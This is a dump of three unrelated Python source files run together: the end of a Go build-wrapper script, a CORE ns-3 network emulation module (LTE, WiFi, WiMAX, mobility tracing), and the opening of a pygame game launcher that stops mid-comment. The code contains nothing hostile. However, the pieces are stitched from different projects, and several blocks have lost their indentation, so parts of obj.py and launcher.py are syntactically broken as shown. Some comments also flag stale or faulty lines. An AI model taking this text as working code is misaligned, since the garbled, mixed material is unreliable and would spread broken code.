        lines.append(' {}.TestMain(m)'.format(test_main_package))
    else:
        lines.append(' os.Exit(m.Run())')
    lines.extend(['}', ''])
    content = '\n'.join(lines)
    # print >>sys.stderr, content
    return content
def do_link_test(args):
    """Link a Go test binary.

    Builds the internal test library (from ++srcs) and/or the external
    test library (from ++xtest_srcs), generates the `_test_main.go`
    driver via gen_test_main(), and links the final test executable.
    Interface and behavior match the original implementation.
    """
    assert args.srcs or args.xtest_srcs
    assert args.test_miner is not None
    module_path = get_source_path(args)
    import_path, _ = get_import_path(module_path)
    int_lib = None  # library built from in-package test sources
    ext_lib = None  # library built from external (_test package) sources
    if args.srcs:
        int_lib = copy_args(args)
        int_lib.output = os.path.join(args.output_root, 'test.a')
        int_lib.vet_report_output = vet_report_output_name(int_lib.output)
        int_lib.module_path = module_path
        int_lib.import_path = import_path
        do_link_lib(int_lib)
    if args.xtest_srcs:
        ext_lib = copy_args(args)
        ext_lib.srcs = ext_lib.xtest_srcs
        classify_srcs(ext_lib.srcs, ext_lib)
        ext_lib.output = os.path.join(args.output_root, 'xtest.a')
        ext_lib.vet_report_output = vet_report_output_name(ext_lib.output)
        ext_lib.module_path = module_path + '_test'
        ext_lib.import_path = import_path + '_test'
        if int_lib:
            # the external test package imports the internal one
            ext_lib.module_map[import_path] = int_lib.output
        do_link_lib(ext_lib)
    # Generate the test driver before touching the output file so a
    # generation failure leaves no partial file behind.
    main_content = gen_test_main(args, int_lib, ext_lib)
    main_src = os.path.join(args.output_root, '_test_main.go')
    with open(main_src, "w") as f:
        f.write(main_content)
    link_args = copy_args(args)
    link_args.srcs = [main_src]
    if link_args.test_import_path is None:
        # it seems that we can do it unconditionally, but this kind
        # of mangling doesn't really looks good to me and we leave it
        # for pure GO_TEST module
        link_args.module_path = link_args.module_path + '___test_main__'
        link_args.import_path = link_args.import_path + '___test_main__'
    classify_srcs(link_args.srcs, link_args)
    if int_lib:
        link_args.module_map[int_lib.import_path] = int_lib.output
    if ext_lib:
        link_args.module_map[ext_lib.import_path] = ext_lib.output
    if args.vet:
        dump_vet_report_for_tests(link_args, int_lib, ext_lib)
    link_args.vet = False
    do_link_exe(link_args)
if __name__ == '__main__':
    # '+' prefix chars keep these wrapper flags distinct from the go
    # tool's own '-' flags.
    parser = argparse.ArgumentParser(prefix_chars='+')
    parser.add_argument('++mode', choices=['lib', 'exe', 'test'], required=True)
    parser.add_argument('++srcs', nargs='*', required=True)
    parser.add_argument('++cgo-srcs', nargs='*')
    parser.add_argument('++test_srcs', nargs='*')
    parser.add_argument('++xtest_srcs', nargs='*')
    parser.add_argument('++cover_info', nargs='*')
    parser.add_argument('++output', nargs='?', default=None)
    parser.add_argument('++build-root', required=True)
    parser.add_argument('++output-root', required=True)
    parser.add_argument('++tools-root', required=True)
    parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
    parser.add_argument('++host-arch', choices=['amd64'], required=True)
    parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
    parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
    parser.add_argument('++peers', nargs='*')
    parser.add_argument('++non-local-peers', nargs='*')
    parser.add_argument('++cgo-peers', nargs='*')
    parser.add_argument('++asmhdr', nargs='?', default=None)
    parser.add_argument('++test-import-path', nargs='?')
    parser.add_argument('++test-miner', nargs='?')
    parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
    parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
    parser.add_argument('++extld', nargs='?', default=None)
    parser.add_argument('++extldflags', nargs='+', default=None)
    parser.add_argument('++goversion', required=True)
    parser.add_argument('++asm-flags', nargs='*')
    parser.add_argument('++compile-flags', nargs='*')
    parser.add_argument('++link-flags', nargs='*')
    parser.add_argument('++vcs', nargs='?', default=None)
    parser.add_argument('++vet', nargs='?', const=True, default=False)
    parser.add_argument('++vet-flags', nargs='*', default=None)
    parser.add_argument('++arc-source-root')
    args = parser.parse_args()
    # Temporary work around for noauto: cgo sources arrive separately and
    # must be filtered out of the plain source list.
    if args.cgo_srcs and len(args.cgo_srcs) > 0:
        cgo_srcs_set = set(args.cgo_srcs)
        args.srcs = list(filter(lambda x: x not in cgo_srcs_set, args.srcs))
    # Resolve go toolchain binaries relative to the tools root.
    args.pkg_root = os.path.join(str(args.tools_root), 'pkg')
    args.tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
    args.go_compile = os.path.join(args.tool_root, 'compile')
    args.go_cgo = os.path.join(args.tool_root, 'cgo')
    args.go_link = os.path.join(args.tool_root, 'link')
    args.go_asm = os.path.join(args.tool_root, 'asm')
    args.go_pack = os.path.join(args.tool_root, 'pack')
    # ++vet is either the boolean flag (True -> use bundled vet tool) or
    # an explicit path to a vet binary.
    args.go_vet = os.path.join(args.tool_root, 'vet') if args.vet is True else args.vet
    args.output = os.path.normpath(args.output)
    args.vet_report_output = vet_report_output_name(args.output)
    # keep the trailing separator so module paths can be sliced off below
    args.build_root = os.path.normpath(args.build_root) + os.path.sep
    args.output_root = os.path.normpath(args.output_root)
    args.import_map = {}
    args.module_map = {}
    # test sources are only meaningful in 'test' mode
    assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
    # add lexical order by basename for go sources
    args.srcs.sort(key=lambda x: os.path.basename(x))
    if args.test_srcs:
        args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
        del args.test_srcs
    if args.xtest_srcs:
        args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
    arc_project_prefix = args.arc_project_prefix
    std_lib_prefix = args.std_lib_prefix
    # compute root relative module dir path
    assert args.output is None or args.output_root == os.path.dirname(args.output)
    assert args.output_root.startswith(args.build_root)
    args.module_path = args.output_root[len(args.build_root):]
    assert len(args.module_path) > 0
    args.import_path, args.is_std = get_import_path(args.module_path)
    classify_srcs(args.srcs, args)
    # NOTE(review): `args.word` is never defined by the parser above, so
    # this assert looks like it references a stale attribute; confirm.
    assert args.asmhdr is None or args.word == 'go'
    try:
        os.unlink(args.output)
    except OSError:
        pass
    # We are going to support only 'lib', 'exe' and 'cgo' build modes currently
    # and as a result we are going to generate only one build node per module
    # (or program)
    dispatch = {
        'lib': do_link_lib,
        'exe': do_link_exe,
        'test': do_link_test
    }
    exit_code = 1
    try:
        dispatch[args.mode](args)
        exit_code = 0
    except KeyError:
        print >>sys.stderr, 'Unknown build mode [{}]...'.format(args.mode)
    except subprocess.CalledProcessError as e:
        print >>sys.stderr, '{} returned non-zero exit code {}. stop.'.format(' '.join(e.cmd), e.returncode)
        print >>sys.stderr, e.output
        exit_code = e.returncode
    except Exception as e:
        print >>sys.stderr, "Unhandled exception [{}]...".format(str(e))
    sys.exit(exit_code)
|
obj.py | #
# CORE
# Copyright (c)2011-2013 the Boeing Company.
# See the LICENSE file included in this directory.
#
# author: Jeff Ahrenholz <jeffrey.m.ahrenholz@boeing.com>
#
'''
ns3.py: defines classes for running emulations with ns-3 simulated networks.
'''
import sys, os, threading, time
from core.netns.nodes import CoreNode
from core.coreobj import PyCoreNet
from core.session import Session
from core.misc import ipaddr
from core.constants import *
from core.misc.utils import maketuple, check_call
from core.api import coreapi
from core.mobility import WayPointMobility
try:
import ns.core
except Exception, e:
print "Could not locate the ns-3 Python bindings!"
print "Try running again from within the ns-3 './waf shell'\n"
raise Exception, e
import ns.lte
import ns.mobility
import ns.network
import ns.internet
import ns.tap_bridge
import ns.wifi
import ns.wimax
ns.core.GlobalValue.Bind("SimulatorImplementationType",
ns.core.StringValue("ns3::RealtimeSimulatorImpl"))
ns.core.GlobalValue.Bind("ChecksumEnabled", ns.core.BooleanValue("true"))
class CoreNs3Node(CoreNode, ns.network.Node):
    ''' The CoreNs3Node is both a CoreNode backed by a network namespace and
    an ns-3 Node simulator object. When linked to simulated networks, the TunTap
    device will be used.
    '''
    def __init__(self, *args, **kwds):
        # Initialize the ns-3 half first so GetId() is available to derive
        # the CORE object id.
        ns.network.Node.__init__(self)
        objid = self.GetId() + 1 # ns-3 ID starts at 0, CORE uses 1
        if 'objid' not in kwds:
            kwds['objid'] = objid
        CoreNode.__init__(self, *args, **kwds)

    def newnetif(self, net = None, addrlist = [], hwaddr = None,
                 ifindex = None, ifname = None):
        ''' Add a network interface. If we are attaching to a CoreNs3Net, this
        will be a TunTap. Otherwise dispatch to CoreNode.newnetif().
        '''
        if not isinstance(net, CoreNs3Net):
            return CoreNode.newnetif(self, net, addrlist, hwaddr, ifindex,
                                     ifname)
        ifindex = self.newtuntap(ifindex = ifindex, ifname = ifname, net = net)
        self.attachnet(ifindex, net)
        netif = self.netif(ifindex)
        netif.sethwaddr(hwaddr)
        for addr in maketuple(addrlist):
            netif.addaddr(addr)
        # Mirror the first IPv4 address onto the ns-3 TapBridge device.
        # NOTE(review): assumes addrlist yields at least one "addr/prefix"
        # string; an empty list would raise IndexError here -- confirm callers.
        addrstr = netif.addrlist[0]
        (addr, mask) = addrstr.split('/')
        tap = net._tapdevs[netif]
        tap.SetAttribute("IpAddress",
                         ns.network.Ipv4AddressValue(ns.network.Ipv4Address(addr)))
        tap.SetAttribute("Netmask",
                         ns.network.Ipv4MaskValue(ns.network.Ipv4Mask("/" + mask)))
        # schedule the interface install at simulation time 0
        ns.core.Simulator.Schedule(ns.core.Time('0'), netif.install)
        return ifindex

    def getns3position(self):
        ''' Return the ns-3 (x, y, z) position of a node.
        '''
        try:
            mm = self.GetObject(ns.mobility.MobilityModel.GetTypeId())
            pos = mm.GetPosition()
            return (pos.x, pos.y, pos.z)
        except AttributeError:
            # no mobility model aggregated to this node yet
            self.warn("ns-3 mobility model not found")
            return (0,0,0)

    def setns3position(self, x, y, z):
        ''' Set the ns-3 (x, y, z) position of a node.
        '''
        try:
            mm = self.GetObject(ns.mobility.MobilityModel.GetTypeId())
            if z is None:
                z = 0.0
            pos = mm.SetPosition(ns.core.Vector(x, y, z))
        except AttributeError:
            self.warn("ns-3 mobility model not found, not setting position")
class CoreNs3Net(PyCoreNet):
    ''' The CoreNs3Net is a helper PyCoreNet object. Networks are represented
    entirely in simulation with the TunTap device bridging the emulated and
    simulated worlds.
    '''
    apitype = coreapi.CORE_NODE_WLAN
    linktype = coreapi.CORE_LINK_WIRELESS
    type = "wlan" # icon used

    def __init__(self, session, objid = None, name = None, verbose = False,
                 start = True, policy = None):
        # verbose/start/policy are accepted for signature compatibility with
        # other PyCoreNet subclasses but are not used here.
        PyCoreNet.__init__(self, session, objid, name)
        self.tapbridge = ns.tap_bridge.TapBridgeHelper()
        # per-interface registries: netif -> ns-3 device / installed TapBridge
        self._ns3devs = {}
        self._tapdevs = {}

    def attach(self, netif):
        ''' Invoked from netif.attach(). Create a TAP device using the TapBridge
        object. Call getns3dev() to get model-specific device.
        '''
        self._netif[netif] = netif
        self._linked[netif] = {}
        ns3dev = self.getns3dev(netif.node)
        tap = self.tapbridge.Install(netif.node, ns3dev)
        tap.SetMode(ns.tap_bridge.TapBridge.CONFIGURE_LOCAL)
        tap.SetAttribute("DeviceName", ns.core.StringValue(netif.localname))
        self._ns3devs[netif] = ns3dev
        self._tapdevs[netif] = tap

    def getns3dev(self, node):
        ''' Implement depending on network helper. Install this network onto
        the given node and return the device. Register the ns3 device into
        self._ns3devs
        '''
        raise NotImplementedError

    def findns3dev(self, node):
        ''' Given a node, return the interface and ns3 device associated with
        this network.
        '''
        for netif in node.netifs():
            if netif in self._ns3devs:
                return netif, self._ns3devs[netif]
        return None, None

    def shutdown(self):
        ''' Session.shutdown() will invoke this.
        '''
        pass

    def usecorepositions(self):
        ''' Set position callbacks for interfaces on this net so the CORE GUI
        can update the ns-3 node position when moved with the mouse.
        '''
        for netif in self.netifs():
            netif.poshook = self.setns3position

    def setns3position(self, netif, x, y, z):
        # position callback (see usecorepositions); forwards to the node
        #print "setns3position: %s (%s, %s, %s)" % (netif.node.name, x, y, z)
        netif.node.setns3position(x, y, z)
class Ns3LteNet(CoreNs3Net):
    def __init__(self, *args, **kwds):
        ''' Uses a LteHelper to create an ns-3 based LTE network.
        '''
        CoreNs3Net.__init__(self, *args, **kwds)
        self.lte = ns.lte.LteHelper()
        # enhanced NodeB node list
        self.enbnodes = []
        # subchannel lists; must be set via setsubchannels() before devices
        # are created in getns3dev()
        self.dlsubchannels = None
        self.ulsubchannels = None

    def setsubchannels(self, downlink, uplink):
        ''' Set the downlink/uplink subchannels, which are a list of ints.
        These should be set prior to using CoreNs3Node.newnetif().
        '''
        self.dlsubchannels = downlink
        self.ulsubchannels = uplink

    def setnodeb(self, node):
        ''' Mark the given node as a nodeb (base transceiver station)
        '''
        self.enbnodes.append(node)

    def linknodeb(self, node, nodeb, mob, mobb):
        ''' Register user equipment with a nodeb.
        Optionally install mobility model while we have the ns-3 devs handy.
        '''
        (tmp, nodebdev) = self.findns3dev(nodeb)
        (tmp, dev) = self.findns3dev(node)
        if nodebdev is None or dev is None:
            raise KeyError, "ns-3 device for node not found"
        self.lte.RegisterUeToTheEnb(dev, nodebdev)
        if mob:
            self.lte.AddMobility(dev.GetPhy(), mob)
        if mobb:
            self.lte.AddDownlinkChannelRealization(mobb, mob, dev.GetPhy())

    def getns3dev(self, node):
        ''' Get the ns3 NetDevice using the LteHelper.
        '''
        # device type depends on whether this node was marked as a nodeb
        if node in self.enbnodes:
            devtype = ns.lte.LteHelper.DEVICE_TYPE_ENODEB
        else:
            devtype = ns.lte.LteHelper.DEVICE_TYPE_USER_EQUIPMENT
        nodes = ns.network.NodeContainer(node)
        devs = self.lte.Install(nodes, devtype)
        devs.Get(0).GetPhy().SetDownlinkSubChannels(self.dlsubchannels)
        devs.Get(0).GetPhy().SetUplinkSubChannels(self.ulsubchannels)
        return devs.Get(0)

    def attach(self, netif):
        ''' Invoked from netif.attach(). Create a TAP device using the TapBridge
        object. Call getns3dev() to get model-specific device.
        '''
        # Overrides CoreNs3Net.attach(): LTE uses "UseLocal" mode and a
        # manually created/raised TAP device instead of CONFIGURE_LOCAL.
        self._netif[netif] = netif
        self._linked[netif] = {}
        ns3dev = self.getns3dev(netif.node)
        self.tapbridge.SetAttribute("Mode", ns.core.StringValue("UseLocal"))
        #self.tapbridge.SetAttribute("Mode",
        #    ns.core.IntegerValue(ns.tap_bridge.TapBridge.USE_LOCAL))
        tap = self.tapbridge.Install(netif.node, ns3dev)
        #tap.SetMode(ns.tap_bridge.TapBridge.USE_LOCAL)
        print "using TAP device %s for %s/%s" % \
            (netif.localname, netif.node.name, netif.name)
        check_call(['tunctl', '-t', netif.localname, '-n'])
        #check_call([IP_BIN, 'link', 'set', 'dev', netif.localname, \
        #    'address', '%s' % netif.hwaddr])
        check_call([IP_BIN, 'link', 'set', netif.localname, 'up'])
        tap.SetAttribute("DeviceName", ns.core.StringValue(netif.localname))
        self._ns3devs[netif] = ns3dev
        self._tapdevs[netif] = tap
class Ns3WifiNet(CoreNs3Net):
    def __init__(self, *args, **kwds):
        ''' Uses a WifiHelper to create an ns-3 based Wifi network.
        '''
        # 'rate' keyword selects the constant 802.11a data mode used for
        # both unicast and non-unicast traffic
        rate = kwds.pop('rate', 'OfdmRate54Mbps')
        CoreNs3Net.__init__(self, *args, **kwds)
        self.wifi = ns.wifi.WifiHelper().Default()
        self.wifi.SetStandard(ns.wifi.WIFI_PHY_STANDARD_80211a)
        self.wifi.SetRemoteStationManager("ns3::ConstantRateWifiManager",
                                          "DataMode",
                                          ns.core.StringValue(rate),
                                          "NonUnicastMode",
                                          ns.core.StringValue(rate))
        # ad-hoc (infrastructureless) MAC over a default YANS channel/phy
        self.mac = ns.wifi.NqosWifiMacHelper.Default()
        self.mac.SetType("ns3::AdhocWifiMac")
        channel = ns.wifi.YansWifiChannelHelper.Default()
        self.phy = ns.wifi.YansWifiPhyHelper.Default()
        self.phy.SetChannel(channel.Create())

    def getns3dev(self, node):
        ''' Get the ns3 NetDevice using the WifiHelper.
        '''
        devs = self.wifi.Install(self.phy, self.mac, node)
        return devs.Get(0)
class Ns3WimaxNet(CoreNs3Net):
    # WiMAX network backed by an ns-3 WimaxHelper with a simple scheduler
    # and OFDM physical layer.
    def __init__(self, *args, **kwds):
        CoreNs3Net.__init__(self, *args, **kwds)
        self.wimax = ns.wimax.WimaxHelper()
        self.scheduler = ns.wimax.WimaxHelper.SCHED_TYPE_SIMPLE
        self.phy = ns.wimax.WimaxHelper.SIMPLE_PHY_TYPE_OFDM
        # base station node list
        self.bsnodes = []

    def setbasestation(self, node):
        # mark the given node as a base station (others become subscribers)
        self.bsnodes.append(node)

    def getns3dev(self, node):
        # Install a WiMAX device on the node; type depends on whether it
        # was registered via setbasestation().
        if node in self.bsnodes:
            devtype = ns.wimax.WimaxHelper.DEVICE_TYPE_BASE_STATION
        else:
            devtype = ns.wimax.WimaxHelper.DEVICE_TYPE_SUBSCRIBER_STATION
        nodes = ns.network.NodeContainer(node)
        devs = self.wimax.Install(nodes, devtype, self.phy, self.scheduler)
        if node not in self.bsnodes:
            devs.Get(0).SetModulationType(ns.wimax.WimaxPhy.MODULATION_TYPE_QAM16_12)
        # debug
        self.wimax.EnableAscii("wimax-device-%s" % node.name, devs)
        return devs.Get(0)

    @staticmethod
    def ipv4netifaddr(netif):
        # Return the first IPv4 (addr, mask) pair on the interface, or
        # (None, None) if it only has IPv6 addresses.
        for addr in netif.addrlist:
            if ':' in addr:
                continue # skip ipv6
            ip = ns.network.Ipv4Address(addr.split('/')[0])
            mask = ns.network.Ipv4Mask('/' + addr.split('/')[1])
            return (ip, mask)
        return (None, None)

    def addflow(self, node1, node2, upclass, downclass):
        ''' Add a Wimax service flow between two nodes.
        '''
        (netif1, ns3dev1) = self.findns3dev(node1)
        (netif2, ns3dev2) = self.findns3dev(node2)
        if not netif1 or not netif2:
            raise ValueError, "interface not found"
        (addr1, mask1) = self.ipv4netifaddr(netif1)
        (addr2, mask2) = self.ipv4netifaddr(netif2)
        # build classifier records for each direction from the up/down
        # class parameter tuples
        clargs1 = (addr1, mask1, addr2, mask2) + downclass
        clargs2 = (addr2, mask2, addr1, mask1) + upclass
        clrec1 = ns.wimax.IpcsClassifierRecord(*clargs1)
        clrec2 = ns.wimax.IpcsClassifierRecord(*clargs2)
        # install matching down/up RTPS service flows on both devices
        ns3dev1.AddServiceFlow( \
            self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_DOWN,
                                         ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec1))
        ns3dev1.AddServiceFlow( \
            self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_UP,
                                         ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec2))
        ns3dev2.AddServiceFlow( \
            self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_DOWN,
                                         ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec2))
        ns3dev2.AddServiceFlow( \
            self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_UP,
                                         ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec1))
class Ns3Session(Session):
    ''' A Session that starts an ns-3 simulation thread.
    '''
    def __init__(self, persistent = False, duration=600):
        # duration: simulation run time in seconds
        self.duration = duration
        self.nodes = ns.network.NodeContainer()
        self.mobhelper = ns.mobility.MobilityHelper()
        Session.__init__(self, persistent = persistent)

    def run(self, vis=False):
        ''' Run the ns-3 simulation and return the simulator thread.

        vis: when True, try to run under the ns-3 PyViz visualizer.
        '''
        def runthread():
            # bound the simulation, run it, then mark the session RUNTIME
            ns.core.Simulator.Stop(ns.core.Seconds(self.duration))
            print "running ns-3 simulation for %d seconds" % self.duration
            if vis:
                try:
                    import visualizer
                except ImportError:
                    # fall back to a plain run if PyViz is unavailable
                    print "visualizer is not available"
                    ns.core.Simulator.Run()
                else:
                    visualizer.start()
            else:
                ns.core.Simulator.Run()
            #self.evq.run() # event queue may have WayPointMobility events
            self.setstate(coreapi.CORE_EVENT_RUNTIME_STATE, info=True,
                          sendevent=True)
        # daemon thread so it won't block interpreter shutdown
        t = threading.Thread(target = runthread)
        t.daemon = True
        t.start()
        return t

    def shutdown(self):
        # TODO: the following line tends to segfault ns-3 (and therefore
        # core-daemon)
        ns.core.Simulator.Destroy()
        Session.shutdown(self)

    def addnode(self, name):
        ''' A convenience helper for Session.addobj(), for adding CoreNs3Nodes
        to this session. Keeps a NodeContainer for later use.
        '''
        n = self.addobj(cls = CoreNs3Node, name=name)
        self.nodes.Add(n)
        return n

    def setupconstantmobility(self):
        ''' Install a ConstantPositionMobilityModel.
        '''
        palloc = ns.mobility.ListPositionAllocator()
        for i in xrange(self.nodes.GetN()):
            # space nodes 100 units apart along the x axis
            (x, y, z) = ((100.0 * i) + 50, 200.0, 0.0)
            palloc.Add(ns.core.Vector(x, y, z))
            node = self.nodes.Get(i)
            node.position.set(x, y, z)
        self.mobhelper.SetPositionAllocator(palloc)
        self.mobhelper.SetMobilityModel("ns3::ConstantPositionMobilityModel")
        self.mobhelper.Install(self.nodes)

    def setuprandomwalkmobility(self, bounds, time=10, speed=25.0):
        ''' Set up the random walk mobility model within a bounding box.
            - bounds is the max (x, y, z) boundary
            - time is the number of seconds to maintain the current speed
            and direction
            - speed is the maximum speed, with node speed randomly chosen
            from [0, speed]
        '''
        (x, y, z) = map(float, bounds)
        self.mobhelper.SetPositionAllocator("ns3::RandomBoxPositionAllocator",
            "X",
            ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" % x),
            "Y",
            ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" % y),
            "Z",
            ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" % z))
        self.mobhelper.SetMobilityModel("ns3::RandomWalk2dMobilityModel",
            "Mode", ns.core.StringValue("Time"),
            "Time", ns.core.StringValue("%ss" % time),
            "Speed",
            ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" \
                % speed),
            "Bounds", ns.core.StringValue("0|%s|0|%s" % (x, y)))
        self.mobhelper.Install(self.nodes)

    def startns3mobility(self, refresh_ms=300):
        ''' Start a thread that updates CORE nodes based on their ns-3
        positions.
        '''
        self.setstate(coreapi.CORE_EVENT_INSTANTIATION_STATE)
        self.mobilitythread = threading.Thread(
            target=self.ns3mobilitythread,
            args=(refresh_ms,))
        self.mobilitythread.daemon = True
        self.mobilitythread.start()

    def ns3mobilitythread(self, refresh_ms):
        ''' Thread target that updates CORE nodes every refresh_ms based on
        their ns-3 positions.
        '''
        valid_states = (coreapi.CORE_EVENT_RUNTIME_STATE,
                        coreapi.CORE_EVENT_INSTANTIATION_STATE)
        while self.getstate() in valid_states:
            for i in xrange(self.nodes.GetN()):
                node = self.nodes.Get(i)
                (x, y, z) = node.getns3position()
                # only broadcast when the position actually changed
                if (x, y, z) == node.position.get():
                    continue
                # from WayPointMobility.setnodeposition(node, x, y, z)
                node.position.set(x, y, z)
                msg = node.tonodemsg(flags=0)
                self.broadcastraw(None, msg)
                self.sdt.updatenode(node.objid, flags=0, x=x, y=y, z=z)
            time.sleep(0.001 * refresh_ms)

    def setupmobilitytracing(self, net, filename, nodes, verbose=False):
        ''' Start a tracing thread using the ASCII output from the ns3
        mobility helper.
        '''
        net.mobility = WayPointMobility(session=self, objid=net.objid,
                                        verbose=verbose, values=None)
        net.mobility.setendtime()
        net.mobility.refresh_ms = 300
        net.mobility.empty_queue_stop = False
        of = ns.network.OutputStreamWrapper(filename, filemode=777)
        self.mobhelper.EnableAsciiAll(of)
        self.mobilitytracethread = threading.Thread(target=self.mobilitytrace,
            args=(net, filename, nodes, verbose))
        self.mobilitytracethread.daemon = True
        self.mobilitytracethread.start()

    def mobilitytrace(self, net, filename, nodes, verbose):
        # Tail the ASCII mobility trace file and convert each line into a
        # CORE waypoint for the WayPointMobility model.
        nodemap = {}
        # move nodes to initial positions
        for node in nodes:
            (x,y,z) = node.getns3position()
            net.mobility.setnodeposition(node, x, y, z)
            nodemap[node.GetId()] = node
        if verbose:
            self.info("mobilitytrace opening '%s'" % filename)
        try:
            f = open(filename)
            f.seek(0,2)
        except Exception, e:
            # NOTE(review): if open() fails, `f` is left unbound and the
            # loop below raises NameError; confirm intended behavior.
            self.warn("mobilitytrace error opening '%s': %s" % (filename, e))
        sleep = 0.001
        kickstart = True
        while True:
            if self.getstate() != coreapi.CORE_EVENT_RUNTIME_STATE:
                break
            line = f.readline()
            if not line:
                # back off (up to 1s) while waiting for new trace output
                time.sleep(sleep)
                if sleep < 1.0:
                    sleep += 0.001
                continue
            sleep = 0.001
            # trace lines look like: node=<id> pos=<x:y:z> vel=<x:y:z> ...
            items = dict(map(lambda x: x.split('='), line.split()))
            if verbose:
                self.info("trace: %s %s %s" % \
                    (items['node'], items['pos'], items['vel']))
            (x, y, z) = map(float, items['pos'].split(':'))
            vel = map(float, items['vel'].split(':'))
            node = nodemap[int(items['node'])]
            net.mobility.addwaypoint(time=0, nodenum=node.objid,
                x=x, y=y, z=z, speed=vel)
            if kickstart:
                # first waypoint kicks off the mobility model/event queue
                kickstart = False
                self.evq.add_event(0, net.mobility.start)
                self.evq.run()
            else:
                if net.mobility.state != net.mobility.STATE_RUNNING:
                    net.mobility.state = net.mobility.STATE_RUNNING
                    self.evq.add_event(0, net.mobility.runround)
        f.close()
|
launcher.py | import time
start = time.perf_counter()
import os
import sys
#disable python warnings
if not sys.warnoptions:
import warnings
warnings.simplefilter("ignore")
#route error output to file
sys.stderr = open('log.txt', 'w+')
#suppress pygame welcome message
oldStdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
import pygame
sys.stdout = oldStdout
import pygame
import PIL
import requests
import wmi
import pywin
import threading
import repair
from resourceManager import ResourceManager
from texture import Texture
from sound import Sound
from Utils.graphics import Resolutions, ConvertImage, DimImage, GetScale, GetScalingFactor
from Utils.performance import FreeMem, TimedGarbageCollect, StopGCThreads
from Utils.game import Stats
from Utils.other import Ask
from preferencies import Preferencies
import pygameWindow
from pygameWindow import WindowFlags
from Utils.debug import Log, LogLevel
from Utils import debug
#check maps folder: create Resources/maps (and its editor subfolder) on
#first run; re-raise on failure since the game cannot run without it
if not os.path.exists('./Resources/maps'):
    print('Directory maps is missing. Creating directory.')
    try:
        os.mkdir('./Resources/maps')
        os.mkdir('./Resources/maps/editor')
    except OSError:
        print('Error! Cannot create directories.')
        raise
    print('Directory created.')
#scale
#used to change size of objects depending on used resolution
#temporarily set to 1 until a better method of calculating it exists
scale = 1
#user preferencies, populated by LoadPreferencies()
prefs = None
#####GAME STATS#####
#circle approach rate (converted value, set in Start())
AR = None
#circle size (converted value, set in Start())
CS = None
#hp drop (converted value, set in Start())
HP = None
#raw stats, converted via SetGameStats() in Start()
AR_raw = 5
CS_raw = 5
HP_raw = 5
#####STATICS#####
#folder paths
texPath = 'Resources/textures/'
mapsPath = 'Resources/maps/'
soundsPath = 'Resources/sounds/'
#resource managers
mainResManager = ResourceManager("mainManager", 0)
#game window, created by InitializeWindow()
mainWindow = None
def LoadPreferencies():
    """Populate the module-level `prefs` from the preferences file.

    Prints and logs any loading error, then re-raises it.
    """
    global prefs
    try:
        prefs = Preferencies.ImportFromFile(Preferencies.PREFS_FILE)
    except Exception as err:
        print("An error appeared during user preferencies loading.")
        Log(str(err), LogLevel.Error, __name__)
        raise
def InitPygame():
    """Pre-configure and initialize the pygame mixer and core modules.

    Prints and logs any initialization error, then re-raises it.
    """
    try:
        # small 512-sample buffer keeps hit-sound latency low
        pygame.mixer.pre_init(22050, 16, 2, 512)
        pygame.mixer.init(allowedchanges=pygame.AUDIO_ALLOW_ANY_CHANGE)
        pygame.init()
    except Exception as err:
        print("An error appeared during pygame initialization.")
        Log(str(err), LogLevel.Error, __name__)
        raise
def SetGameStats(ar, cs, hp):
    """Clamp raw AR/CS/HP values and convert them to usable game values.

    :param ar: raw approach rate
    :param cs: raw circle size
    :param hp: raw hp drop
    :returns: tuple of converted (AR, CS, HP) values
    """
    try:
        # clamp each raw value to the allowed range first
        ar, cs, hp = Stats.Clamp(ar), Stats.Clamp(cs), Stats.Clamp(hp)
        # then convert stats to actual usable values
        return (Stats.GetAR(ar), Stats.GetCS(cs), Stats.GetHP(hp))
    except Exception as err:
        print("An error appeared during initializing game stats.")
        Log(str(err), LogLevel.Error, __name__)
        raise
def InitializeWindow(width, height):
    """Create the application window.

    :param width: window width in pixels (int)
    :param height: window height in pixels (int)
    :returns: the window object created by pygameWindow.CreateWindow
    """
    try:
        pygame.mouse.set_visible(prefs.mouseVisible)
        # every mode uses double buffering + hardware acceleration;
        # fullscreen takes precedence over borderless
        flags = WindowFlags.DoubleBuf | WindowFlags.Accelerated
        if prefs.fullscreen:
            flags = WindowFlags.FullScreen | flags
        elif prefs.borderless:
            flags = WindowFlags.BorderLess | flags
        win = pygameWindow.CreateWindow(width, height, "Oss!", flags)
        Log("Current display driver: {}.".format(pygame.display.get_driver()), LogLevel.Info, __name__)
        return win
    except Exception as err:
        print("An error appeared during window initialization.")
        Log(str(err), LogLevel.Error, __name__)
        raise
def LoadTextures():
    """Load all texture groups on parallel threads and wait for completion.

    Prints and logs any loading error, then re-raises it.
    """
    try:
        workers = [
            threading.Thread(name="BgTexLoadThread", target=LoadBackgroundTextures),
            threading.Thread(name="CircleTexLoadThread", target=LoadCircleTextures),
            threading.Thread(name="InterfaceTexLoadThread", target=LoadInterfaceTextures),
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
    except Exception as err:
        print("An error appeared during textures loading.")
        Log(str(err), LogLevel.Error, __name__)
        raise
def LoadCircleTextures():
    # Load the circle number fonts, circle backgrounds and hit overlay.
    # NOTE(review): `radius` already includes `scale`, and `scale` is
    # multiplied in again below -- harmless while scale == 1, but this
